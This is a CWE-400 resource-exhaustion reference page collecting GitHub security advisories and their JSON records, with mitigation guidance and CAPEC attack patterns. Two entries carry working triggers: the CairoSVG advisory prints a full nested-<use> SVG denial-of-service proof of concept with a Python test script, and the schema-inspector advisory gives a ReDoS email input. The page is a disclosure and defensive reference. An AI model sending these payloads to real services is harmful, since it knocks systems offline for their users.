Common Weakness Enumeration

CWE-400

Discouraged

Uncontrolled Resource Consumption

Abstraction: Class · Status: Draft

The product does not properly control the allocation and maintenance of a limited resource.

5412 vulnerabilities reference this CWE, most recent first.

GHSA-F38F-5XPM-9R7C

Vulnerability from github – Published: 2026-03-13 18:57 – Updated: 2026-04-15 21:09
VLAI
Summary
CairoSVG vulnerable to Exponential DoS via recursive <use> element amplification
Details

Summary

Kozea/CairoSVG (~300K downloads/week) has exponential denial of service via recursive <use> element amplification in cairosvg/defs.py (line ~335). This causes CPU exhaustion from a small input.

Severity

High — CVSS 3.1: 7.5 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Vulnerable Code

File: cairosvg/defs.py (line ~335), function use()

The use() function recursively processes <use> elements without any depth or count limits. With 5 levels of nesting and 10 references each, a 1,411-byte SVG triggers 10^5 = 100,000 render calls.

Impact

  • 1,411-byte SVG payload pins CPU at 100% indefinitely
  • Memory stays flat at ~43MB — no OOM kill, process never terminates
  • Any service accepting SVG input (thumbnailing, PDF generation, avatar rendering) is DoS-able
  • Amplification factor: O(10^N) rendering calls from O(N) input

Proof of Concept

Save as poc.svg and run timeout 10 cairosvg poc.svg -o test.png:

<?xml version="1.0"?>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
  <defs>
    <g id="a"><rect width="1" height="1"/></g>
    <g id="b"><use xlink:href="#a"/><use xlink:href="#a"/><use xlink:href="#a"/><use xlink:href="#a"/><use xlink:href="#a"/><use xlink:href="#a"/><use xlink:href="#a"/><use xlink:href="#a"/><use xlink:href="#a"/><use xlink:href="#a"/></g>
    <g id="c"><use xlink:href="#b"/><use xlink:href="#b"/><use xlink:href="#b"/><use xlink:href="#b"/><use xlink:href="#b"/><use xlink:href="#b"/><use xlink:href="#b"/><use xlink:href="#b"/><use xlink:href="#b"/><use xlink:href="#b"/></g>
    <g id="d"><use xlink:href="#c"/><use xlink:href="#c"/><use xlink:href="#c"/><use xlink:href="#c"/><use xlink:href="#c"/><use xlink:href="#c"/><use xlink:href="#c"/><use xlink:href="#c"/><use xlink:href="#c"/><use xlink:href="#c"/></g>
    <g id="e"><use xlink:href="#d"/><use xlink:href="#d"/><use xlink:href="#d"/><use xlink:href="#d"/><use xlink:href="#d"/><use xlink:href="#d"/><use xlink:href="#d"/><use xlink:href="#d"/><use xlink:href="#d"/><use xlink:href="#d"/></g>
  </defs>
  <use xlink:href="#e"/>
</svg>

Expected: timeout kills the process after 10 seconds (it never completes on its own).

Alternatively test with Python:

import cairosvg, signal
signal.alarm(5)  # Kill after 5 seconds
try:
    cairosvg.svg2png(bytestring=open("poc.svg").read())
except:
    print("[!!!] CONFIRMED: CPU exhaustion — process did not complete in 5s")

Suggested Fix

Add recursion depth counter to use() function. Cap at e.g. 10 levels. Also add total element budget to prevent amplification.

References

Credit

Kai Aizen (SnailSploit) — Adversarial AI & Security Research

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 2.8.2"
      },
      "package": {
        "ecosystem": "PyPI",
        "name": "CairoSVG"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.9.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-31899"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-13T18:57:31Z",
    "nvd_published_at": "2026-03-13T19:54:38Z",
    "severity": "HIGH"
  },
  "details": "## Summary\n\nKozea/CairoSVG (~300K downloads/week) has exponential denial of service via recursive `\u003cuse\u003e` element amplification in `cairosvg/defs.py` (line ~335). This causes CPU exhaustion from a small input.\n\n## Severity\n\nHigh \u2014 CVSS 3.1: 7.5\nVector: `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H`\n\n## Vulnerable Code\n\nFile: `cairosvg/defs.py` (line ~335), function `use()`\n\nThe `use()` function recursively processes `\u003cuse\u003e` elements without any depth or count limits. With 5 levels of nesting and 10 references each, a 1,411-byte SVG triggers 10^5 = 100,000 render calls.\n\n## Impact\n\n- 1,411-byte SVG payload pins CPU at 100% indefinitely\n- Memory stays flat at ~43MB \u2014 no OOM kill, process never terminates\n- Any service accepting SVG input (thumbnailing, PDF generation, avatar rendering) is DoS-able\n- Amplification factor: O(10^N) rendering calls from O(N) input\n\n## Proof of Concept\n\nSave as `poc.svg` and run `timeout 10 cairosvg poc.svg -o test.png`:\n\n```xml\n\u003c?xml version=\"1.0\"?\u003e\n\u003csvg xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\"\u003e\n  \u003cdefs\u003e\n    \u003cg id=\"a\"\u003e\u003crect width=\"1\" height=\"1\"/\u003e\u003c/g\u003e\n    \u003cg id=\"b\"\u003e\u003cuse xlink:href=\"#a\"/\u003e\u003cuse xlink:href=\"#a\"/\u003e\u003cuse xlink:href=\"#a\"/\u003e\u003cuse xlink:href=\"#a\"/\u003e\u003cuse xlink:href=\"#a\"/\u003e\u003cuse xlink:href=\"#a\"/\u003e\u003cuse xlink:href=\"#a\"/\u003e\u003cuse xlink:href=\"#a\"/\u003e\u003cuse xlink:href=\"#a\"/\u003e\u003cuse xlink:href=\"#a\"/\u003e\u003c/g\u003e\n    \u003cg id=\"c\"\u003e\u003cuse xlink:href=\"#b\"/\u003e\u003cuse xlink:href=\"#b\"/\u003e\u003cuse xlink:href=\"#b\"/\u003e\u003cuse xlink:href=\"#b\"/\u003e\u003cuse xlink:href=\"#b\"/\u003e\u003cuse xlink:href=\"#b\"/\u003e\u003cuse xlink:href=\"#b\"/\u003e\u003cuse xlink:href=\"#b\"/\u003e\u003cuse xlink:href=\"#b\"/\u003e\u003cuse xlink:href=\"#b\"/\u003e\u003c/g\u003e\n    \u003cg id=\"d\"\u003e\u003cuse xlink:href=\"#c\"/\u003e\u003cuse xlink:href=\"#c\"/\u003e\u003cuse xlink:href=\"#c\"/\u003e\u003cuse xlink:href=\"#c\"/\u003e\u003cuse xlink:href=\"#c\"/\u003e\u003cuse xlink:href=\"#c\"/\u003e\u003cuse xlink:href=\"#c\"/\u003e\u003cuse xlink:href=\"#c\"/\u003e\u003cuse xlink:href=\"#c\"/\u003e\u003cuse xlink:href=\"#c\"/\u003e\u003c/g\u003e\n    \u003cg id=\"e\"\u003e\u003cuse xlink:href=\"#d\"/\u003e\u003cuse xlink:href=\"#d\"/\u003e\u003cuse xlink:href=\"#d\"/\u003e\u003cuse xlink:href=\"#d\"/\u003e\u003cuse xlink:href=\"#d\"/\u003e\u003cuse xlink:href=\"#d\"/\u003e\u003cuse xlink:href=\"#d\"/\u003e\u003cuse xlink:href=\"#d\"/\u003e\u003cuse xlink:href=\"#d\"/\u003e\u003cuse xlink:href=\"#d\"/\u003e\u003c/g\u003e\n  \u003c/defs\u003e\n  \u003cuse xlink:href=\"#e\"/\u003e\n\u003c/svg\u003e\n```\n\nExpected: `timeout` kills the process after 10 seconds (it never completes on its own).\n\nAlternatively test with Python:\n```python\nimport cairosvg, signal\nsignal.alarm(5)  # Kill after 5 seconds\ntry:\n    cairosvg.svg2png(bytestring=open(\"poc.svg\").read())\nexcept:\n    print(\"[!!!] CONFIRMED: CPU exhaustion \u2014 process did not complete in 5s\")\n```\n\n## Suggested Fix\n\nAdd recursion depth counter to `use()` function. Cap at e.g. 10 levels. Also add total element budget to prevent amplification.\n\n## References\n\n- [CWE-400](https://cwe.mitre.org/data/definitions/400.html)\n\n## Credit\n\nKai Aizen (SnailSploit) \u2014 Adversarial AI \u0026 Security Research",
  "id": "GHSA-f38f-5xpm-9r7c",
  "modified": "2026-04-15T21:09:46Z",
  "published": "2026-03-13T18:57:31Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/Kozea/CairoSVG/security/advisories/GHSA-f38f-5xpm-9r7c"
    },
    {
      "type": "WEB",
      "url": "https://github.com/Kozea/CairoSVG/commit/6dde8685ed3f19837767bce7a13a5491e3d0e0bf"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/Kozea/CairoSVG"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "CairoSVG vulnerable to Exponential DoS via recursive \u003cuse\u003e element amplification"
}

GHSA-F38P-C2GQ-4PMR

Vulnerability from github – Published: 2021-03-19 20:14 – Updated: 2022-07-05 18:05
VLAI
Summary
Regular Expression Denial-of-Service in npm schema-inspector
Details

Impact

What kind of vulnerability is it? Who is impacted? Email address validation is vulnerable to a denial-of-service attack where some input (for example a@0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.) will freeze the program or web browser page executing the code. This affects any current schema-inspector users using any version to validate email addresses. Users who do not do email validation, and instead do other types of validation (like string min or max length, etc), are not affected.

Patches

Has the problem been patched? What versions should users upgrade to? Users should upgrade to version 2.0.0, which uses a regex expression that isn't vulnerable to ReDoS. The new regex expression is more limited in what it can check, so it is more flexible than the one used before. Therefore, this was a new major version instead of a new patch version to warn people upgrading that they should make sure the email validation still works for their use case.

Workarounds

Is there a way for users to fix or remediate the vulnerability without upgrading? If a user chooses to not upgrade, the only known workaround would be to stop using the email validation feature in the library. The user could, for example, accept the email address into their system but save it in a "not yet validated" state in their system until a verification email is sent to it (to determine whether the email is valid and belongs to the form submitter). Note that this is the preferred way of validating email addresses anyways.

References

Are there any links users can visit to find out more? https://gist.github.com/mattwelke/b7f42424680a57b8161794ad1737cd8f

For more information

If you have any questions or comments about this advisory, you can create an issue in this repository.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "schema-inspector"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.0.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2021-21267"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-20",
      "CWE-400"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2021-03-19T20:14:08Z",
    "nvd_published_at": "2021-03-19T21:15:00Z",
    "severity": "HIGH"
  },
  "details": "### Impact\n_What kind of vulnerability is it? Who is impacted?_\nEmail address validation is vulnerable to a denial-of-service attack where some input (for example `a@0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.`) will freeze the program or web browser page executing the code. This affects any current schema-inspector users using any version to validate email addresses. Users who do not do email validation, and instead do other types of validation (like string min or max length, etc), are not affected.\n\n### Patches\n_Has the problem been patched? What versions should users upgrade to?_\nUsers should upgrade to version 2.0.0, which uses a regex expression that isn\u0027t vulnerable to ReDoS. The new regex expression is more limited in what it can check, so it is more flexible than the one used before. Therefore, this was a new major version instead of a new patch version to warn people upgrading that they should make sure the email validation still works for their use case. \n\n### Workarounds\n_Is there a way for users to fix or remediate the vulnerability without upgrading?_\nIf a user chooses to not upgrade, the only known workaround would be to stop using the email validation feature in the library. The user could, for example, accept the email address into their system but save it in a \"not yet validated\" state in their system until a verification email is sent to it (to determine whether the email is valid and belongs to the form submitter). Note that this is the preferred way of validating email addresses anyways.\n\n### References\n_Are there any links users can visit to find out more?_\nhttps://gist.github.com/mattwelke/b7f42424680a57b8161794ad1737cd8f\n\n### For more information\nIf you have any questions or comments about this advisory, you can create an issue in this repository.",
  "id": "GHSA-f38p-c2gq-4pmr",
  "modified": "2022-07-05T18:05:18Z",
  "published": "2021-03-19T20:14:21Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/schema-inspector/schema-inspector/security/advisories/GHSA-f38p-c2gq-4pmr"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-21267"
    },
    {
      "type": "WEB",
      "url": "https://gist.github.com/mattwelke/b7f42424680a57b8161794ad1737cd8f"
    },
    {
      "type": "WEB",
      "url": "https://github.com/schema-inspector/schema-inspector/releases/tag/2.0.0"
    },
    {
      "type": "WEB",
      "url": "https://security.netapp.com/advisory/ntap-20210528-0006"
    },
    {
      "type": "WEB",
      "url": "https://www.npmjs.com/package/schema-inspector"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Regular Expression Denial-of-Service in npm schema-inspector"
}

GHSA-F392-JC49-593J

Vulnerability from github – Published: 2022-05-24 17:43 – Updated: 2022-05-24 17:43
VLAI
Details

Trend Micro's Virus Scan API (VSAPI) and Advanced Threat Scan Engine (ATSE) - are vulnerable to a memory exhaustion vulnerability that may lead to denial-of-service or system freeze if exploited by an attacker using a specially crafted file.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2021-25252"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2021-03-03T16:15:00Z",
    "severity": "MODERATE"
  },
  "details": "Trend Micro\u0027s Virus Scan API (VSAPI) and Advanced Threat Scan Engine (ATSE) - are vulnerable to a memory exhaustion vulnerability that may lead to denial-of-service or system freeze if exploited by an attacker using a specially crafted file.",
  "id": "GHSA-f392-jc49-593j",
  "modified": "2022-05-24T17:43:35Z",
  "published": "2022-05-24T17:43:34Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-25252"
    },
    {
      "type": "WEB",
      "url": "https://success.trendmicro.com/solution/000285675"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-F39X-GX7X-WWFJ

Vulnerability from github – Published: 2024-02-12 09:31 – Updated: 2024-02-14 18:30
VLAI
Details

Processing of user-defined mail search expressions is not limited. Availability of OX App Suite could be reduced due to high processing load. Please deploy the provided updates and patch releases. Processing time of mail search expressions now gets monitored, and the related request is terminated if a resource threshold is reached. No publicly available exploits are known.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-41707"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-02-12T09:15:11Z",
    "severity": "MODERATE"
  },
  "details": "Processing of user-defined mail search expressions is not limited. Availability of OX App Suite could be reduced due to high processing load. Please deploy the provided updates and patch releases. Processing time of mail search expressions now gets monitored, and the related request is terminated if a resource threshold is reached.\n No publicly available exploits are known.",
  "id": "GHSA-f39x-gx7x-wwfj",
  "modified": "2024-02-14T18:30:24Z",
  "published": "2024-02-12T09:31:27Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-41707"
    },
    {
      "type": "WEB",
      "url": "https://documentation.open-xchange.com/appsuite/security/advisories/csaf/2023/oxas-adv-2023-0007.json"
    },
    {
      "type": "WEB",
      "url": "https://software.open-xchange.com/products/appsuite/doc/Release_Notes_for_Patch_Release_6259_7.10.6_2023-12-11.pdf"
    },
    {
      "type": "WEB",
      "url": "http://packetstormsecurity.com/files/177130/OX-App-Suite-7.10.6-Cross-Site-Scirpting-Denial-Of-Service.html"
    },
    {
      "type": "WEB",
      "url": "http://seclists.org/fulldisclosure/2024/Feb/10"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-F3G2-HMGR-Q2MJ

Vulnerability from github – Published: 2024-04-09 03:30 – Updated: 2024-09-29 00:30
VLAI
Details

The ABAP Application Server of SAP NetWeaver as well as ABAP Platform allows an attacker to prevent legitimate users from accessing a service, either by crashing or flooding the service. This leads to a considerable impact on availability.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-30218"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400",
      "CWE-605"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-04-09T01:15:50Z",
    "severity": "MODERATE"
  },
  "details": "The ABAP Application Server of SAP NetWeaver as well as ABAP Platform\u00a0allows an attacker to prevent legitimate users from accessing a service, either by crashing or flooding the service. This leads to a considerable impact on availability.\n\n",
  "id": "GHSA-f3g2-hmgr-q2mj",
  "modified": "2024-09-29T00:30:57Z",
  "published": "2024-04-09T03:30:53Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-30218"
    },
    {
      "type": "WEB",
      "url": "https://me.sap.com/notes/3359778"
    },
    {
      "type": "WEB",
      "url": "https://support.sap.com/en/my-support/knowledge-base/security-notes-news.html?anchorId=section_370125364"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-F3HF-R62C-MFRJ

Vulnerability from github – Published: 2025-09-12 21:32 – Updated: 2025-09-15 13:46
VLAI
Summary
Liferay Portal: Missing Rate Limiting in GraphQL Endpoint Enables Resource Exhaustion Attack
Details

Liferay Portal 7.4.0 through 7.4.3.101, and Liferay DXP 2023.Q3.0 through 2023.Q3.4, 7.4 GA through update 92 and 7.3 GA though update 35 does not limit the number of objects returned from a GraphQL queries, which allows remote attackers to perform denial-of-service (DoS) attacks on the application by executing queries that return a large number of objects.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Maven",
        "name": "com.liferay:com.liferay.portal.vulcan.api"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "8.0.2"
            },
            {
              "fixed": "40.2.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Maven",
        "name": "com.liferay:com.liferay.portal.vulcan.impl"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "5.0.7"
            },
            {
              "fixed": "5.0.105"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-43796"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-09-15T13:46:24Z",
    "nvd_published_at": "2025-09-12T20:15:42Z",
    "severity": "HIGH"
  },
  "details": "Liferay Portal 7.4.0 through 7.4.3.101, and Liferay DXP 2023.Q3.0 through 2023.Q3.4, 7.4 GA through update 92 and 7.3 GA though update 35 does not limit the number of objects returned from a GraphQL queries, which allows remote attackers to perform denial-of-service (DoS) attacks on the application by executing queries that return a large number of objects.",
  "id": "GHSA-f3hf-r62c-mfrj",
  "modified": "2025-09-15T13:46:24Z",
  "published": "2025-09-12T21:32:14Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-43796"
    },
    {
      "type": "WEB",
      "url": "https://github.com/liferay/liferay-portal/commit/2e4adf041e31f3474a14c29b7c135693f6529400"
    },
    {
      "type": "WEB",
      "url": "https://github.com/liferay/liferay-portal/commit/2f74f23982fb03238f9b4ae145c33a9c1084f07e"
    },
    {
      "type": "WEB",
      "url": "https://github.com/liferay/liferay-portal/commit/3780804b0d8f4f14bfca470a3e2e662bc6cef588"
    },
    {
      "type": "WEB",
      "url": "https://github.com/liferay/liferay-portal/commit/8344aec3bebcd2ca409794523d5db5be6047c3dd"
    },
    {
      "type": "WEB",
      "url": "https://github.com/liferay/liferay-portal/commit/83e77963499d4d3e7cc82cc48e63c992f6f29a6d"
    },
    {
      "type": "WEB",
      "url": "https://github.com/liferay/liferay-portal/commit/8dda4adc0e9e7b6f82d4b3959592cad61640309b"
    },
    {
      "type": "WEB",
      "url": "https://github.com/liferay/liferay-portal"
    },
    {
      "type": "WEB",
      "url": "https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/CVE-2025-43796"
    },
    {
      "type": "WEB",
      "url": "http://github.com/liferay/liferay-portal/commit/8f7eb98e05a5ea6961346ecc21fd73e4b46bba99"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Liferay Portal: Missing Rate Limiting in GraphQL Endpoint Enables Resource Exhaustion Attack"
}

GHSA-F3PM-M5M9-45GW

Vulnerability from github – Published: 2022-05-24 19:03 – Updated: 2022-08-11 00:00
VLAI
Details

A flaw was found in spice in versions before 0.14.92. A DoS tool might make it easier for remote attackers to cause a denial of service (CPU consumption) by performing many renegotiations within a single connection.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2021-20201"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2021-05-28T11:15:00Z",
    "severity": "HIGH"
  },
  "details": "A flaw was found in spice in versions before 0.14.92. A DoS tool might make it easier for remote attackers to cause a denial of service (CPU consumption) by performing many renegotiations within a single connection.",
  "id": "GHSA-f3pm-m5m9-45gw",
  "modified": "2022-08-11T00:00:29Z",
  "published": "2022-05-24T19:03:38Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-20201"
    },
    {
      "type": "WEB",
      "url": "https://blog.qualys.com/product-tech/2011/10/31/tls-renegotiation-and-denial-of-service-attacks"
    },
    {
      "type": "WEB",
      "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1921846"
    },
    {
      "type": "WEB",
      "url": "https://security.gentoo.org/glsa/202208-10"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-F3QJ-WR66-G552

Vulnerability from github – Published: 2026-06-03 00:30 – Updated: 2026-06-03 21:30
VLAI
Details

Dräger Core 1.0.5 and Dräger M540 Converter Service 1.0.9 contain a denial of service vulnerability that allows network-adjacent attackers to trigger high CPU load by sending specially crafted, unencrypted SDC messages during the discovery process. Attackers with access to the hospital network can send malformed SDC packets to exhaust CPU resources in the affected process, causing further SDC messages to no longer be processed.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-14036"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-06-02T22:16:15Z",
    "severity": "HIGH"
  },
  "details": "Dr\u00e4ger Core 1.0.5 and Dr\u00e4ger M540 Converter Service 1.0.9 contain a denial of service vulnerability that allows network-adjacent attackers to trigger high CPU load by sending specially crafted, unencrypted SDC messages during the discovery process. Attackers with access to the hospital network can send malformed SDC packets to exhaust CPU resources in the affected process, causing further SDC messages to no longer be processed.",
  "id": "GHSA-f3qj-wr66-g552",
  "modified": "2026-06-03T21:30:28Z",
  "published": "2026-06-03T00:30:25Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-14036"
    },
    {
      "type": "WEB",
      "url": "https://static.draeger.com/security"
    },
    {
      "type": "WEB",
      "url": "https://static.draeger.com/security/download/PSA-24-110-1-gSOAP-Product-Security-Advisory.pdf"
    },
    {
      "type": "WEB",
      "url": "https://www.vulncheck.com/advisories/dr-ger-core-denial-of-service-via-malformed-sdc-message"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-F3X9-2XRG-95G2

Vulnerability from github – Published: 2022-05-01 18:26 – Updated: 2022-05-01 18:26
VLAI
Details

Stack consumption vulnerability in AkkyWareHOUSE 7-zip32.dll before 4.42.00.04, as derived from Igor Pavlov 7-Zip before 4.53 beta, allows user-assisted remote attackers to execute arbitrary code via a long filename in an archive, leading to a heap-based buffer overflow.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2007-4725"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2007-09-05T19:17:00Z",
    "severity": "MODERATE"
  },
  "details": "Stack consumption vulnerability in AkkyWareHOUSE 7-zip32.dll before 4.42.00.04, as derived from Igor Pavlov 7-Zip before 4.53 beta, allows user-assisted remote attackers to execute arbitrary code via a long filename in an archive, leading to a heap-based buffer overflow.",
  "id": "GHSA-f3x9-2xrg-95g2",
  "modified": "2022-05-01T18:26:30Z",
  "published": "2022-05-01T18:26:30Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2007-4725"
    },
    {
      "type": "WEB",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/36459"
    },
    {
      "type": "WEB",
      "url": "http://akky.cjb.net/security/7-zip3.txt"
    },
    {
      "type": "WEB",
      "url": "http://jvn.jp/jp/JVN%2362868899/index.html"
    },
    {
      "type": "WEB",
      "url": "http://osvdb.org/40482"
    },
    {
      "type": "WEB",
      "url": "http://secunia.com/advisories/26624"
    },
    {
      "type": "WEB",
      "url": "http://sourceforge.net/project/shownotes.php?release_id=535160\u0026group_id=14481"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/25545"
    },
    {
      "type": "WEB",
      "url": "http://www.vupen.com/english/advisories/2007/3086"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-F42H-PJ3V-GMW8

Vulnerability from github – Published: 2024-12-09 15:31 – Updated: 2024-12-09 15:31
VLAI
Details

Dell PowerScale OneFS Versions 9.5.0.x through 9.8.0.x contain an uncontrolled resource consumption vulnerability. A low privilege remote attacker could potentially exploit this vulnerability, leading to denial of service.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-42426"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-12-09T15:15:15Z",
    "severity": "MODERATE"
  },
  "details": "Dell PowerScale OneFS Versions 9.5.0.x through 9.8.0.x contain an uncontrolled resource consumption vulnerability. A low privilege remote attacker could potentially exploit this vulnerability, leading to denial of service.",
  "id": "GHSA-f42h-pj3v-gmw8",
  "modified": "2024-12-09T15:31:37Z",
  "published": "2024-12-09T15:31:37Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-42426"
    },
    {
      "type": "WEB",
      "url": "https://www.dell.com/support/kbdoc/en-in/000256645/dsa-2024-453-security-update-for-dell-powerscale-onefs-multiple-security-vulnerabilities"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
      "type": "CVSS_V3"
    }
  ]
}

Mitigation
Architecture and Design

Design throttling mechanisms into the system architecture. The best protection is to limit the amount of resources that an unauthorized user can cause to be expended. A strong authentication and access control model will help prevent such attacks from occurring in the first place. The login application should be protected against DoS attacks as much as possible. Limiting the database access, perhaps by caching result sets, can help minimize the resources expended. To further limit the potential for a DoS attack, consider tracking the rate of requests received from users and blocking requests that exceed a defined rate threshold.

Mitigation
Architecture and Design
  • Mitigation of resource exhaustion attacks requires that the target system either:
  • The first of these solutions is an issue in itself though, since it may allow attackers to prevent the use of the system by a particular valid user. If the attacker impersonates the valid user, they may be able to prevent the user from accessing the server in question.
  • The second solution is simply difficult to effectively institute -- and even when properly done, it does not provide a full solution. It simply makes the attack require more resources on the part of the attacker.
  • recognizes the attack and denies that user further access for a given amount of time, or
  • uniformly throttles all requests in order to make it more difficult to consume resources more quickly than they can again be freed.
Mitigation
Architecture and Design

Ensure that protocols have specific limits of scale placed on them.

Mitigation
Implementation

Ensure that all failures in resource allocation place the system into a safe posture.

CAPEC-147: XML Ping of the Death

An attacker initiates a resource depletion attack where a large number of small XML messages are delivered at a sufficiently rapid rate to cause a denial of service or crash of the target. Transactions such as repetitive SOAP transactions can deplete resources faster than a simple flooding attack because of the additional resources used by the SOAP protocol and the resources necessary to process SOAP messages. The transactions used are immaterial as long as they cause resource utilization on the target. In other words, this is a normal flooding attack augmented by using messages that will require extra processing on the target.

CAPEC-227: Sustained Client Engagement

An adversary attempts to deny legitimate users access to a resource by continually engaging a specific resource in an attempt to keep the resource tied up as long as possible. The adversary's primary goal is not to crash or flood the target, which would alert defenders; rather it is to repeatedly perform actions or abuse algorithmic flaws such that a given resource is tied up and not available to a legitimate user. By carefully crafting a requests that keep the resource engaged through what is seemingly benign requests, legitimate users are limited or completely denied access to the resource.

CAPEC-492: Regular Expression Exponential Blowup

